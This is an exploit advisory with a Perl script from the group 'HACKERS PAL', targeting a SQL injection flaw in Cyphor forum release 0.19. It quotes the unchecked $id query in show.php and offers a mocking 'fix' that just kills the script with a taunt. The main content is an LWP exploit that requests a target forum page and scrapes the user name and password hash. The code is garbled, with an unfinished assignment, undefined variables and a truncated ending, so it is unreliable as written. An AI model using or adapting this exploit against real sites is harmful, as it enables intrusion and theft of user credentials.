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Cyphor (Release: 0.19) Sql injection


This is sql injection in cyphor

Discovered by : HACKERS PAL

Greets For Devil-00 - Abducter - Almaster
injected vresions :-
Cyphor  (Release: 0.19) and all Versions Up To now
injected File
injection code :-
Discovering the vul :-
searching in show.php file in line 59 to 62 as below

    if ($id) {
        // a message with id=$id will be displayed
        $message_mode = 1;
        $query = "SELECT * FROM $db_table_name WHERE id=$id";

The Programmed Didont Check The $id Variable .. if it was integer
How to protect :-

        $message_mode = 1;

        // Script Protection By : HACKERS PAL
        die("<br>We Dont allow Skript Kidz .. <br> By <a 
hre='Http://www.sqor.net'>HACKERS PAL</a>");
        // !/script Porotection By : HACKERS PAL fINISHED
exploit :-

#!/bin/env perl


#//        Cyphor Forum SQL Injection Exploit .. By HACKERS PAL

#//                   Greets For Devil-00 - Abducter - Almaster

#//                          http://WwW.SoQoR.NeT


use LWP::Simple;

print "\n#####################################################";

print "\n#      Cyphor Forum Exploit By : HACKERS PAL        #";

print "\n#               Http://WwW.SoQoR.NeT                #";

if(!$ARGV[0]||!$ARGV[1]) {

print "\n# -- Usage:                                         #";

print "\n# -- perl $0 [Full-Path] 1                      #";

print "\n# -- Example:                                       #";

print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#";

print "\n#     Greets To Devil-00 - Abducter - almastar      #";

print "\n#####################################################\n";





print "\n#     Greets To Devil-00 - Abducter - almastar      #";

print "\n#####################################################\n";


$url = 


$page = get($site) || die "[-] Unable to retrieve: $!";

print "\n[+] Connected to: $ARGV[0]\n";

print "[+] User ID is : $id ";

$page =~ m/<span class=bigh>(.*?)<\/span>/ && print "\n[+] User Name is: $1\n";

print "\n[-] Unable to retrieve User Name\n" if(!$1);

$page =~ m/<span class=message>(.*?)<\/span>/ && print "[+] Hash of password 
is: $1\n";

print "[-] Unable to retrieve hash of password\n" if(!$1);


print "\n\nGreets From HACKERS PAL To you :)\nWwW.SoQoR.NeT . . . You Are 
